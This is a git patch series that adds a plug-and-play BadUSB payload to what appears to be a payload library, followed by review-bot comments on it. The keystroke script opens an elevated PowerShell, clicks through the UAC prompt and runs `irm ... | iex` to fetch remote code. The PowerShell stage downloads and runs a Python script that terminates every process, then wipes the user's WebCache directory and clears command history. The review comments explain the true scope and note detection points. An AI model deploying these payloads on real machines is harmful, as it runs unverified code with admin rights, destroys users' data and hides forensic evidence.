From 541515bd5d03b9c8193637931ce5f4c9081e685b Mon Sep 17 00:00:00 2001
From: Aleff
Date: Mon, 12 Jun 2023 11:34:48 +0200
Subject: [PATCH 1/3] Close All Applications
---
.../CloseAllApplicationsInWindows/payload.txt | 44 +++++++++++++++++++
1 file changed, 44 insertions(+)
create mode 100644 payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
new file mode 100644
index 0000000..5c1bd2a
--- /dev/null
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
@@ -0,0 +1,44 @@
+REM #####################################################
+REM # |
+REM # Title : Close All Applications |
+REM # Author : Aleff |
+REM # Version : 1.0 |
+REM # Category : Execution |
+REM # Target : Windows 10-11 |
+REM # |
+REM #####################################################
+
+REM Plug-And-Play
+
+REM
+REM 1. Open a powershell
+REM 2. Download a Python script
+REM 3. Execute it
+REM 4. Remove Python script downloaded
+REM 5. Delete powershell history
+REM
+
+REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
+DEFINE POWERSHEL_CODE example.com
+
+DELAY 2000
+GUI x
+DELAY 250
+DOWNARROW
+DOWNARROW
+DOWNARROW
+DOWNARROW
+DOWNARROW
+DOWNARROW
+DOWNARROW
+DOWNARROW
+DOWNARROW
+DOWNARROW
+ENTER
+DELAY 1000
+TAB
+TAB
+ENTER
+DELAY 2000
+STRING irm POWERSHEL_CODE | iex
+ENTER
From fd1f9c16d886606db965c7d2799a02e3880bb86b Mon Sep 17 00:00:00 2001
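Review bot: The header comment's step list does not match what the keystrokes do: step 2 says a Python script is downloaded, but `STRING irm POWERSHEL_CODE | iex` fetches and evaluates a PowerShell script from the DEFINE'd URL, and the `GUI x` … `TAB TAB ENTER` sequence looks like it opens the admin PowerShell entry and confirms the UAC prompt, which step 1 does not say. I would document both, e.g. `REM 1. Open an elevated PowerShell (confirms the UAC prompt)` and `REM 2. Download and run close_all_app.ps1 from the configured URL (no integrity check)`, so anyone auditing the payload knows that remote, unverified code runs with administrator rights. "Reply with YOUR LINK" presumably means "Replace". For defenders, this stage appears as an interactive PowerShell session running `irm … | iex`, which PowerShell script-block logging records when it is enabled.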
From: aleff-github
Date: Mon, 12 Jun 2023 11:35:43 +0200
Subject: [PATCH 2/3] script
---
.../CloseAllApplicationsInWindows/README.md | 28 +++++++++++++++++++
.../close_all_app.ps1 | 18 ++++++++++++
.../CloseAllApplicationsInWindows/script.py | 12 ++++++++
3 files changed, 58 insertions(+)
create mode 100644 payloads/library/execution/CloseAllApplicationsInWindows/README.md
create mode 100644 payloads/library/execution/CloseAllApplicationsInWindows/close_all_app.ps1
create mode 100644 payloads/library/execution/CloseAllApplicationsInWindows/script.py
diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/README.md b/payloads/library/execution/CloseAllApplicationsInWindows/README.md
new file mode 100644
index 0000000..5ea11cf
--- /dev/null
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/README.md
@@ -0,0 +1,28 @@
+# Close All Applications - BADUSB ✅
+
+A script used to close all target open applications.
+
+🟢 **Plug-And-Play** 🟢
+
+**Category**: Execution
+
+## Description
+
+A script used to close all target open applications.
+
+Opens PowerShell hidden, download a Python script, execute it, remove Python script downloaded, delete powershell history.
+
+## Getting Started
+
+### Dependencies
+
+* Internet Connection
+* Windows 10,11
+
+### Executing program
+
+* Plug in your device
+
+### Settings
+
+- No settings - Plug-And-Play
diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/close_all_app.ps1 b/payloads/library/execution/CloseAllApplicationsInWindows/close_all_app.ps1
new file mode 100644
index 0000000..9e147f4
--- /dev/null
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/close_all_app.ps1
@@ -0,0 +1,18 @@
+# Download Python script
+
+# Reply $scriptUrl with YOUR LINK. The Payload should be script.py
+$scriptUrl = "YOUR_END_USER_LINK_WITH_PAYLOAD"
+$savePath = "$env:temp\script.py"
+(New-Object System.Net.WebClient).DownloadFile($scriptUrl, $savePath)
+
+# Execute Python script
+& python $savePath
+
+# Delete the downloaded script
+Remove-Item $savePath
+
+# Clear the download history from the system's web cache
+Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force
+
+# Clear the PowerShell command history
+Clear-History
diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/script.py b/payloads/library/execution/CloseAllApplicationsInWindows/script.py
new file mode 100644
index 0000000..f50c816
--- /dev/null
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/script.py
@@ -0,0 +1,12 @@
+try:
+ import psutil
+except:
+ import os
+ os.system("pip install psutil")
+ import psutil
+
+for process in psutil.process_iter():
+ try:
+ process.terminate()
+ except:
+ pass
From 8e8c4542dd49ec051d2c068dfe53eb116ea3408c Mon Sep 17 00:00:00 2001
From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com>
Date: Mon, 12 Jun 2023 14:54:50 -0400
Subject: [PATCH 3/3] Update payload.txt
---
.../CloseAllApplicationsInWindows/payload.txt | 18 ++++--------------
1 file changed, 4 insertions(+), 14 deletions(-)
diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
index 5c1bd2a..5d6d187 100644
--- a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
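Review bot: The cleanup at the end of close_all_app.ps1 does more than its comment says: `Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force` targets the user's entire WebCache store, not a record of this one download, which is data loss for the user and evidence removal from an incident-response point of view. The comment should say so, e.g. `# Deletes the whole per-user WebCache directory (destructive; removes forensic evidence)`. The script also runs whatever `$scriptUrl` serves via `& python $savePath` with no hash or signature check, and it needs a Python interpreter on PATH that the README's dependency list does not mention. For detection, this stage is visible as powershell.exe writing a .py file under %TEMP%, spawning python on it, and then deleting under WebCache.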
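Review bot: The loop in script.py calls `process.terminate()` on every process that `psutil.process_iter()` yields, not only on user applications as the README describes, so the documented scope understates the impact (unsaved-data loss, and possibly system instability if it runs from an elevated shell, as the payload appears to arrange). A module docstring should state the real scope. Both bare `except:` clauses hide the cause of any failure; the import fallback should be `except ImportError:` and the loop should catch `(psutil.NoSuchProcess, psutil.AccessDenied)`. `os.system("pip install psutil")` installs an unpinned package from the network at run time, which is a supply-chain exposure worth calling out in a comment.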
@@ -19,26 +19,16 @@ REM 5. Delete powershell history REM REM Reply with YOUR LINK. The Payload should be close_all_app.ps1 -DEFINE POWERSHEL_CODE example.com +DEFINE POWERSHELL_CODE example.com DELAY 2000 GUI x DELAY 250 -DOWNARROW -DOWNARROW -DOWNARROW -DOWNARROW -DOWNARROW -DOWNARROW -DOWNARROW -DOWNARROW -DOWNARROW -DOWNARROW +REPEAT 10 DOWNARROW ENTER DELAY 1000 -TAB -TAB +REPEAT 2 TAB ENTER DELAY 2000 -STRING irm POWERSHEL_CODE | iex +STRING irm POWERSHELL_CODE | iex ENTER